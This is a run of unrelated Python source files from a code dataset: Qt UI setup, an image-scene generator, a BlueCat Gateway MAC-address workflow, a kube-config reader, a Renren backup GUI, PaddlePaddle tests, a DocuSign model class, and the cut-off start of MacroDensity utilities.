self.action_zoom_in.setText(_translate(\"main_application\", \"Zoom in\", None))\n self.action_zoom_in.setToolTip(_translate(\"main_application\", \"Zoom overview in\", None))\n self.action_zoom_in.setShortcut(_translate(\"main_application\", \"Ctrl++\", None))\n self.action_zoom_out.setText(_translate(\"main_application\", \"Zoom out\", None))\n self.action_zoom_out.setToolTip(_translate(\"main_application\", \"Zoom overview out\", None))\n self.action_zoom_out.setShortcut(_translate(\"main_application\", \"Ctrl+-\", None))\n self.action_revert_mapping.setText(_translate(\"main_application\", \"Revert mapping...\", None))\n self.action_revert_mapping.setToolTip(_translate(\"main_application\", \"Revert current mapping to last saved\",\n None))\n self.action_collapse_overview.setText(_translate(\"main_application\", \"Collapse overview\", None))\n self.action_collapse_overview.setToolTip(_translate(\"main_application\", \"Decrease overview\\'s y range\", None))\n self.action_expand_overview.setText(_translate(\"main_application\", \"Expand overview\", None))\n self.action_expand_overview.setToolTip(_translate(\"main_application\", \"Increase overview\\'s y range\", None))\n self.action_preferences.setText(_translate(\"main_application\", \"Preferences\", None))\n self.action_preferences.setToolTip(_translate(\"main_application\", \"View and change preferences\", None))\n self.action_about.setText(_translate(\"main_application\", \"About\", None))\n self.action_about.setToolTip(_translate(\"main_application\", \"Information about SWAN\", None))\n self.action_tutorials.setText(_translate(\"main_application\", \"Tutorials\", None))\n self.action_export_to_csv.setText(_translate(\"main_application\", \"Export to CSV...\", None))\n self.action_export_to_odml.setText(_translate(\"main_application\", \"Export to odML...\", None))\n self.action_import_from_csv.setText(_translate(\"main_application\", \"Import from csv\", None))\n self.action_restore_state.setText(_translate(\"main_application\", \"Restore GUI state\", None))\n self.action_revert_state.setText(_translate(\"main_application\", \"Revert GUI state\", None))\n self.action_save_state.setText(_translate(\"main_application\", \"Save GUI state\", None))\n\n def load_icons(self):\n \"\"\"\n Loads the icons.\n \n \"\"\"\n try:\n prefix = \":\" + sep + \"icons\" + sep\n # File\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"new.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_new_project.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"open.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_load_project.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"save.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_save_project.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"save_as.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_save_as.setIcon(icon)\n # Edit\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"revert.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_revert_mapping.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"swap.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_swap.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"zoom_in.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_zoom_in.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"zoom_out.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_zoom_out.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"expand.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_expand_overview.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"collapse.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_collapse_overview.setIcon(icon)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(prefix + \"preferences.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.action_preferences.setIcon(icon)\n except Exception as e:\n print(\"Icon Exception: {exception}\".format(exception=e))\n pass\n"} {"ext": "py", "sha": "1a30bfa58394f6e7f42ba7213bc2f23010d0481f", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nContainer for building a scene with fluorescent objects (i.e., scene plays a role of background or frame).\n\n@author: ssklykov\n\"\"\"\n# %% Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from skimage.util import img_as_ubyte\nimport os\nfrom skimage.io import imsave\nfrom scipy.ndimage import measurements\n\n\n# %% class definition\nclass u_scene():\n \"\"\"Class composing all capabilities of building image (numpy 2D array) with some objects drawn on the scene.\n The image commonly is designated as width x height (e.g., 800x600)\"\"\"\n\n # default values\n width = 100\n height = 100\n possible_img_types = ['uint8', 'uint16', 'float']\n image_type = 'uint8'\n scene_image = np.zeros((height, width), dtype=image_type)\n maxPixelValue = 255\n counter = 1 # counting how many images saved along generation\n centers_of_mass = []\n\n # %% Constructor\n def __init__(self, width: int, height: int, image_type: str = 'uint8'):\n \"\"\"\n Initialize the blank (dark) scene image with the specified type (800x600 8bit image as an example)\n\n Parameters\n ----------\n width : int\n Width of the initialized image (scene)\n height : int\n Height of the initialized image (scene)\n image_type : str, optional\n Image type used for pixel value calculations. Possible values are: 'uint8', 'uint16', 'float'.\n The default is 'uint8'.\n\n Returns\n -------\n None.\n\n \"\"\"\n width = abs(width)\n height = abs(height)\n if width > 0:\n self.width = width\n if height > 0:\n self.width = width\n if image_type in self.possible_img_types:\n self.image_type = image_type\n else:\n self.image_type = 'uint8'\n print(\"Image type hasn't been recognized, initialized default 8bit gray image\")\n if (width != 100) or (height != 100) or (image_type != 'uint8'):\n # non default values => re-initialization of the class attributes\n self.scene_image = np.zeros((height, width), dtype=self.image_type)\n self.width = width\n self.height = height\n if self.image_type == 'uint16':\n self.maxPixelValue = 65535\n elif self.image_type == 'float':\n self.maxPixelValue = 1.0 # According to the specification of scikit-image\n\n # %% Supportive functions\n def cast_pixels_sum(self, pixels_sum):\n \"\"\"\n Casting of input result of pixel summing to conform with data type of the used image.\n\n Parameters\n ----------\n pixels_sum : uint8, uint16 or float\n Sum of pixels (mask + scene (background)).\n\n Returns\n -------\n value_returned : uint8, uint16 or float\n Returns casted / corrected pixel value.\n\n \"\"\"\n if (pixels_sum) <= self.maxPixelValue:\n # additional conversion for insuring of conformity with data type\n if self.image_type == 'uint8':\n value_returned = np.uint8(pixels_sum)\n elif self.image_type == 'uint16':\n value_returned = np.uint16(pixels_sum)\n else:\n value_returned = float(pixels_sum)\n else:\n value_returned = self.maxPixelValue\n return value_returned\n\n def get_j_finish(self, j_start: int, nCols: int) -> int:\n \"\"\"\n Calculation of maximum j index for adding mask, preventing it to be for out of bounds.\n\n Parameters\n ----------\n j_start : int\n Starting index for filling mask in.\n nCols : int\n Number of columns in mask that should be added to the scene.\n\n Returns\n -------\n int\n Ending (\"final\") index j for filling mask into the scene.\n\n \"\"\"\n if ((j_start + nCols) < self.width): # checking that starting/ending of summing are not out of bounds\n j_finish = j_start + nCols\n else:\n j_finish = self.width\n return j_finish\n\n def get_i_finish(self, i_start: int, nRows: int) -> int:\n \"\"\"\n Calculation of maximum i index for adding mask, preventing it to be for out of bounds\n\n Parameters\n ----------\n i_start : int\n Starting index for filling mask in.\n nRows : int\n Number of columns in mask that should be added to the scene.\n\n Returns\n -------\n int\n Ending (\"final\") index j for filling mask into the scene.\n\n \"\"\"\n if ((i_start + nRows) < self.height): # checking that starting/ending of summing are not out of bounds\n i_finish = i_start + nRows\n else:\n i_finish = self.height\n return i_finish\n\n # %% Drawing of an object with some intensity mask (profile)\n def add_mask(self, i_start: int, j_start: int, mask, debug: bool = False):\n \"\"\"\n Adding the \"mask\" - representation of the object (basically, less than the scene (background) image).\n Contradictory, i_start represents \"y\" coordinate, j_start - \"x\", due to array representation of column and row.\n This function accepts coordinates of image origin - starting pixel for drawing (like zero pixel).\n The coordinates (j_start, i_start) as (x, y) could be negative or exceeding the scene sizes - in such case\n whenever it possible, only the part of an object image will be added.\n\n Parameters\n ----------\n i_start : int\n Start pixel (y coordinate) for drawing of an image (\"mask\").\n j_start : int\n Start pixel (x coordinate) for drawing of an image (\"mask\").\n mask : np.array\n 2D np.array (\"mask\") with pixel values which represent the object.\n debug: bool, optional\n Flag for saving some internal statistical values for checking of possible bugs during calculations.\n The default is False.\n\n Returns\n -------\n None.\n The scene collected as internal attribute of this class.\n\n \"\"\"\n (nRows, nCols) = np.shape(mask) # getting of sizes of mask\n\n # Below is checking that the mask is not empty, it should be 1x1 matrix at least\n if (nRows == 0) or (nCols == 0):\n raise(IndexError('Provided mask is empty along some of its axis'))\n\n # Below is checking that the i_start and j_start makes sense to apply to the scene image:\n # i_start and j_start could be negative, but at least 1 point should be added to a scene\n # also, j associates with WIDTH, so with # of columns! i - with rows!\n if ((i_start + nRows) < 1) or ((j_start + nCols) < 1):\n raise(IndexError('Provided i_start or j_start is not conformed with the mask sizes'))\n\n # Below is checking filling parameters (i_start, j_start) is laying on an scene image\n if (i_start >= self.height) or (j_start >= self.width):\n raise(IndexError(\"Starting indices for adding mask is out of scene image bounds\"))\n\n # i_start, j_start > 0 both, filling some mask into a scene image - basic check for conformity\n if (i_start >= 0) and (j_start >= 0) and (nRows > 0) and (nCols > 0):\n # Attempt to speed up the adding mask to a scene: transferring pixel values as chunk with rows\n if ((i_start + nRows) < self.height): # checking that fast sum over y axis could be performed\n i_finish = i_start + nRows\n j_finish = self.get_j_finish(j_start, nCols)\n\n # \"Fast summing\" - adding the whole rows (all columns) to the image (scene)\n for j in range(j_start, j_finish): # summing along j axis\n # checking the conformity with image type\n if np.max(self.scene_image[i_start:i_finish, j] + mask[:, j-j_start]) <= self.maxPixelValue:\n self.scene_image[i_start:i_finish, j] += mask[:, j-j_start] # fast adding mask to a scene\n else:\n # checking each pixel from a scene and added from a mask pixel to be in range with image type\n for i in range(i_start, i_finish):\n pixels_sum = self.scene_image[i, j] + mask[i-i_start, j-j_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n\n # Attempt to speed up the adding mask to a scene: transferring pixel values as a chunk with columns\n elif ((j_start + nCols) < self.width): # checking that fast sum over i axis could be performed\n j_finish = j_start + nCols\n i_finish = self.get_i_finish(i_start, nRows)\n\n # \"Fast summing\" - along column - adding all rows at once\n for i in range(i_start, i_finish): # summing along j axis\n # checking the conformity with image type\n if np.max(self.scene_image[i, j_start:j_finish] + mask[i-i_start, :]) <= self.maxPixelValue:\n self.scene_image[i, j_start:j_finish] += mask[i-i_start, :] # fast adding mask to a scene\n else:\n # checking each pixel from a scene and added from a mask pixel to be in range with image type\n for j in range(j_start, j_finish):\n pixels_sum = self.scene_image[i, j] + mask[i-i_start, j-j_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n\n # filling right upper corner with exceptional case - when mask is out of image bounds\n else:\n i_finish = self.height\n j_finish = self.width\n for i in range(i_start, i_finish):\n for j in range(j_start, j_finish):\n pixels_sum = self.scene_image[i, j] + mask[i-i_start, j-j_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n\n # Making correction of i_start, j_start if some of them is negative for working with partial mask overlap\n if (i_start < 0) or (j_start < 0):\n i_mask_start = 0\n j_mask_start = 0\n if (i_start < 0):\n nRows += i_start # it will draw the mask if it partially overlaps with image boundaries\n i_mask_start = abs(i_start)\n i_start = 0\n if (j_start < 0):\n nCols += j_start\n j_mask_start = abs(j_start)\n j_start = 0\n i_finish = self.get_i_finish(i_start, nRows)\n j_finish = self.get_j_finish(j_start, nCols)\n for i in range(i_start, i_finish):\n for j in range(j_start, j_finish):\n pixels_sum = self.scene_image[i, j] + mask[i+i_mask_start, j+j_mask_start]\n self.scene_image[i, j] = self.cast_pixels_sum(pixels_sum)\n # HINT: below is controlling of simulation - calculation of center of mass of added mask (generated scene)\n if debug:\n (i_mass_center, j_mass_center) = measurements.center_of_mass(self.scene_image)\n self.centers_of_mass.append([i_mass_center, j_mass_center])\n # print([i_mass_center, j_mass_center])\n\n # %% Plotting the summurized image (scene) with all objects\n def plot_image(self):\n \"\"\"\n Plotting the self.scene composed with added masks (objects) / noise.\n\n Returns\n -------\n Plotted the scene (picture) on the separate window using matplotlib library\n\n \"\"\"\n plt.figure()\n # Below - representation according to the documentation:\n # plt.cm.gray - for representing gray values, aspect - for filling image values in a window\n # origin - for adjusting origin of pixels (0, 0), extent - regulation of axis values\n # extent = (-0.5, numcols-0.5, -0.5, numrows-0.5)) - for origin = 'lower' - documents\n plt.imshow(self.scene_image, cmap=plt.cm.gray, aspect='auto', origin='lower',\n extent=(0, self.width, 0, self.height))\n plt.tight_layout()\n\n # %% Clearing the scene\n def clear_scene(self):\n \"\"\"\n Clearing the scene (background) image by re-initialize it to zero values (completely dark).\n\n Returns\n -------\n None.\n\n \"\"\"\n self.scene_image = np.zeros((self.height, self.width), dtype=self.image_type)\n\n # %% Saving generated scene image\n def save_scene(self, base_extension: str = \"jpg\"):\n \"\"\"\n Saving the scene (image) with all collected masks (objects) on it.\n\n Parameters\n ----------\n base_extension : str, optional\n The base extension for saving images (like jpg, png, tiff, etc). The default is \"jpg\".\n\n Returns\n -------\n None.\n\n \"\"\"\n scriptFolder = os.getcwd()\n default_folder = \"tests\"\n path = os.path.join(scriptFolder, default_folder)\n # print(path)\n if not os.path.isdir(path):\n os.mkdir(path)\n if os.path.isdir(path):\n # print(path)\n base_name = str(self.counter) + \".\" + base_extension\n self.counter += 1\n path_for_bead = os.path.join(path, base_name)\n if base_extension == \"jpg\" or base_extension == \"jpeg\":\n imsave(path_for_bead, self.scene_image, quality=100)\n else:\n imsave(path_for_bead, self.scene_image)\n\n\n# %% Testing class methods / construction\nif __name__ == '__main__':\n uScene = u_scene(150, 150, 'uint8')\n mask = np.ones((20, 20), dtype='uint8')\n mask = mask[:, :]*256\n uScene.add_mask(40, 40, mask)\n uScene.add_mask(80, 80, mask)\n uScene.plot_image()\n uScene.save_scene()\n"} {"ext": "py", "sha": "1a30bfc6feaa706123bd93f8aa309ab181bc795f", "content": "# Copyright 2019 BlueCat Networks (USA) Inc. and its affiliates\n# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# By: BlueCat Networks\n# Date: 2021-11-10\n# Gateway Version: 18.10.2\n# Description: Confirm MAC Address Page\n\n# Various Flask framework items.\nfrom flask import url_for, redirect, render_template, flash, g\n\nfrom bluecat import route, util\nfrom bluecat.entity import Entity\nfrom bluecat.api_exception import PortalException\n\nimport config.default_config as config\nfrom main_app import app\n\nfrom .confirm_mac_address_form import get_resource_text\nfrom .confirm_mac_address_form import GenericFormTemplate\n\ndef get_configuration():\n configuration = None\n if g.user:\n configuration = g.user.get_api().get_configuration(config.default_configuration)\n return configuration\n\ndef get_mac_address(configuration, address):\n mac_addr = None\n try:\n mac_addr = configuration.get_mac_address(address)\n print(mac_addr)\n except PortalException:\n pass\n return mac_addr\n\n\n# The workflow name must be the first part of any endpoints defined in this file.\n# If you break this rule, you will trip up on other people's endpoint names and\n# chaos will ensue.\n@route(app, '/confirm_mac_address/confirm_mac_address_endpoint')\n@util.workflow_permission_required('confirm_mac_address_page')\n@util.exception_catcher\ndef confirm_mac_address_confirm_mac_address_page():\n form = GenericFormTemplate()\n configuration = get_configuration()\n return render_template(\n 'confirm_mac_address_page.html',\n form=form,\n text=get_resource_text(),\n options=g.user.get_options(),\n )\n\n@route(app, '/confirm_mac_address/form', methods=['POST'])\n@util.workflow_permission_required('confirm_mac_address_page')\n@util.exception_catcher\ndef confirm_mac_address_confirm_mac_address_page_form():\n form = GenericFormTemplate()\n configuration = get_configuration()\n text = get_resource_text()\n \n if form.validate_on_submit():\n mac_address = get_mac_address(configuration, form.mac_address.data)\n if mac_address is not None:\n mac_pool=mac_address.get_property('macPool')\n if mac_pool is None:\n mac_pool=text['nomacpool']\n flash(mac_address.get_address() + text['registered'] , 'succeed')\n flash('MAC Pool : ' + mac_pool, 'succeed')\n else:\n flash(form.mac_address.data + text['noregistered'], 'failed')\n \n # Put form processing code here\n g.user.logger.info('SUCCESS')\n return redirect(url_for('confirm_mac_addressconfirm_mac_address_confirm_mac_address_page'))\n else:\n g.user.logger.info('Form data was not valid.')\n return render_template(\n 'confirm_mac_address_page.html',\n form=form,\n text=text,\n options=g.user.get_options(),\n )\n"} {"ext": "py", "sha": "1a30c050f0c817ab25120d1c571880c40f48bd96", "content": "import yaml\nstream=file(\"/home/vagrant/.kube/config\", 'r')\nyml=yaml.load(stream)\nprint yml[\"clusters\"][0][\"cluster\"][\"certificate-authority-data\"]\n# print yaml.dump(yml)\n\n"} {"ext": "py", "sha": "1a30c0a56da2c2d1169f301507df66a8807945ff", "content": "import sys\nimport spider\nfrom spider_ui import Ui_Dialog, QtWidgets, QtGui\n\n\nclass SpiderDialog(QtWidgets.QDialog):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.spider = spider.RenrenSpider()\n self.init_signals()\n if self.spider.is_login():\n self.ui.loginFrame.hide()\n self.ui.mainFrame.show()\n\n def init_signals(self):\n self.ui.loginBtn.clicked.connect(self.on_login)\n self.ui.startBtn.clicked.connect(self.on_start)\n self.ui.browserBtn.clicked.connect(self.on_browse_dir)\n\n def on_login(self):\n email = self.ui.emailInput.text()\n password = self.ui.passwordInput.text()\n remember = self.ui.rememberCkb.isChecked()\n icode = self.ui.iCodeInput.text()\n try:\n self.spider.login(email, password, icode, remember)\n except spider.iCodeRequired as e:\n self.show_icode()\n error = QtWidgets.QErrorMessage()\n error.showMessage(str(e))\n else:\n self.ui.loginFrame.hide()\n self.ui.mainFrame.show()\n\n def show_icode(self):\n with open('icode.jpg', 'wb') as f:\n f.write(self.spider.get_icode_image())\n icode_image = QtGui.QImage('icode.jpg')\n icode_pixmap = QtGui.QPixmap.fromImage(icode_image)\n self.ui.iCodeImg.setPixmap(icode_pixmap)\n self.ui.iCodeFrame.show()\n\n def on_start(self):\n self.spider.set_params(\n user_id=self.ui.userInput.text(),\n output_dir=self.ui.outputPathInput.text()\n )\n self.ui.progressFrame.show()\n self.spider.main(self)\n self.ui.label.setText(\"备份完成!\")\n\n def on_browse_dir(self):\n file_dialog = QtWidgets.QFileDialog()\n file_dialog.setFileMode(QtWidgets.QFileDialog.Directory)\n file_dialog.setOption(QtWidgets.QFileDialog.ShowDirsOnly)\n if file_dialog.exec_():\n self.ui.outputPathInput.setText(file_dialog.selectedFiles()[0])\n\n def progressbar(self, total: int, desc: str):\n ui = self.ui\n\n class ProgressBar(object):\n def __init__(self):\n self.current = 0.0\n ui.label.setText(desc)\n ui.progressBar.reset()\n\n def update(self, number: int = 1):\n self.current += number\n ui.progressBar.setValue(int(self.current / total * 100))\n\n return ProgressBar()\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n dialog = SpiderDialog()\n dialog.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30c0f2d3d98f4ad9810b94a3b7c29586620c71", "content": "# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test for fusion of fc and activation.\"\"\"\nfrom __future__ import print_function\n\nimport unittest\nimport numpy as np\n\nimport paddle.fluid as fluid\nfrom inference_pass_test import InferencePassTest\nfrom paddle import enable_static\nfrom paddle.fluid.core import PassVersionChecker\n\nenable_static()\n\n\nclass FCGeluTanhOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n gelu_out = fluid.layers.gelu(fc_out, approximate=False)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [gelu_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n\n\nclass FCGeluErfOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n gelu_out = fluid.layers.gelu(fc_out, approximate=True)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [gelu_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCTanhOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n tanh_out = fluid.layers.tanh(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [tanh_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCSigmoidOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n sigmoid_out = fluid.layers.sigmoid(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [sigmoid_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCHardSwishOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n hardswish_out = fluid.layers.hard_swish(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [hardswish_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nclass FCMishOneDnnFusePassTest(InferencePassTest):\n\n def setUp(self):\n self.set_params()\n with fluid.program_guard(self.main_program, self.startup_program):\n data = fluid.data(name=\"data\",\n shape=[-1, 128, 768],\n dtype=\"float32\")\n fc_out = fluid.layers.fc(input=data, size=3072, num_flatten_dims=2)\n mish_out = fluid.layers.mish(fc_out)\n\n self.feeds = {\"data\": np.random.random((1, 128, 768)).astype(\"float32\")}\n\n self.fetch_list = [mish_out]\n self.enable_mkldnn = True\n\n def set_params(self):\n self.pass_name = \"fc_act_mkldnn_fuse_pass\"\n\n def test_check_output(self):\n self.check_output()\n self.assertTrue(PassVersionChecker.IsCompatible(self.pass_name))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"} {"ext": "py", "sha": "1a30c2711a6a007426cc1ca55a5fdbb26572d1d2", "content": "# coding: utf-8\n\n\"\"\"\n DocuSign Click API\n\n DocuSign Click lets you capture consent to standard agreement terms with a single click: terms and conditions, terms of service, terms of use, privacy policies, and more. The Click API lets you include this customizable clickwrap solution in your DocuSign integrations. # noqa: E501\n\n OpenAPI spec version: v1\n Contact: devcenter@docusign.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass ServiceVersion(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'version': 'str',\n 'version_url': 'str'\n }\n\n attribute_map = {\n 'version': 'version',\n 'version_url': 'versionUrl'\n }\n\n def __init__(self, version=None, version_url=None): # noqa: E501\n \"\"\"ServiceVersion - a model defined in Swagger\"\"\" # noqa: E501\n\n self._version = None\n self._version_url = None\n self.discriminator = None\n\n if version is not None:\n self.version = version\n if version_url is not None:\n self.version_url = version_url\n\n @property\n def version(self):\n \"\"\"Gets the version of this ServiceVersion. # noqa: E501\n\n # noqa: E501\n\n :return: The version of this ServiceVersion. # noqa: E501\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"Sets the version of this ServiceVersion.\n\n # noqa: E501\n\n :param version: The version of this ServiceVersion. # noqa: E501\n :type: str\n \"\"\"\n\n self._version = version\n\n @property\n def version_url(self):\n \"\"\"Gets the version_url of this ServiceVersion. # noqa: E501\n\n # noqa: E501\n\n :return: The version_url of this ServiceVersion. # noqa: E501\n :rtype: str\n \"\"\"\n return self._version_url\n\n @version_url.setter\n def version_url(self, version_url):\n \"\"\"Sets the version_url of this ServiceVersion.\n\n # noqa: E501\n\n :param version_url: The version_url of this ServiceVersion. # noqa: E501\n :type: str\n \"\"\"\n\n self._version_url = version_url\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(ServiceVersion, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ServiceVersion):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a30c2ce3f7cd935e1807d6df0a90a33ebfc7ff3", "content": "###############################################################################\n# Copyright Keith Butler(2014) #\n# #\n# This file MacroDensity.density_tools.py is free software: you can #\n# redistribute it and/or modify it under the terms of the GNU General Public #\n# License as published by the Free Software Foundation, either version 3 of #\n# the License, or (at your option) any later version. #\n# This program is distributed in the hope that it will be useful, but WITHOUT #\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #\n# more details. #\n# You should have received a copy of the GNU General Public License along with#\n# this program. If not, see <http://www.gnu.org/licenses/>. #\n# #\n###############################################################################\n\nfrom __future__ import print_function, division\nfrom functools import reduce\nimport math\nfrom itertools import chain\n\nimport numpy\nimport numpy as np\nfrom scipy import interpolate\n\n#------------------------------------------------------------------------------\ndef gradient_magnitude(gx, gy, gz):\n \"\"\"Converts the separate gradient magnitudes to a single magnitude\n Args:\n gx/y/z : fields in x y and z directions 2D array\n Returns:\n grad_mag : gradient of fields at each point\"\"\"\n\n grad_mag = gx\n for i in range(gx.shape[0]):\n for j in range(gy.shape[1]):\n for k in range(gz.shape[2]):\n grad_mag[i,j,k] = np.sqrt(gx[i,j,k]**2 +\n gy[i,j,k]**2 +\n gz[i,j,k]**2)\n\n return grad_mag\n#------------------------------------------------------------------------------\n\ndef vector_2_abscissa(vector, magnitude, dx, dy, dz):\n \"\"\"Converts a vector with a magnitude given in units of grid density\n (NGX/Y/Z) to AA for plotting\n Args:\n vector : the vector along which the line is being plotted [(3x1) array]\n magnitude : the number of steps that were taken along that vector\n [Integer]\n dx/y/z: the resolution of the density grid in AA-1 [Real]\n Returns:\n abscissa : the values for plotting on the abscissa in AA [1D array]\n \"\"\"\n vec_mag = np.linalg.norm([vector[0] * dx, vector[1] * dy, vector[2] * dz])\n abscissa = [i * vec_mag for i in range(magnitude)]\n\n return np.asarray(abscissa)\n#------------------------------------------------------------------------------\n\ndef number_in_field(gradients, cutoff):\n \"\"\"Get number of grid 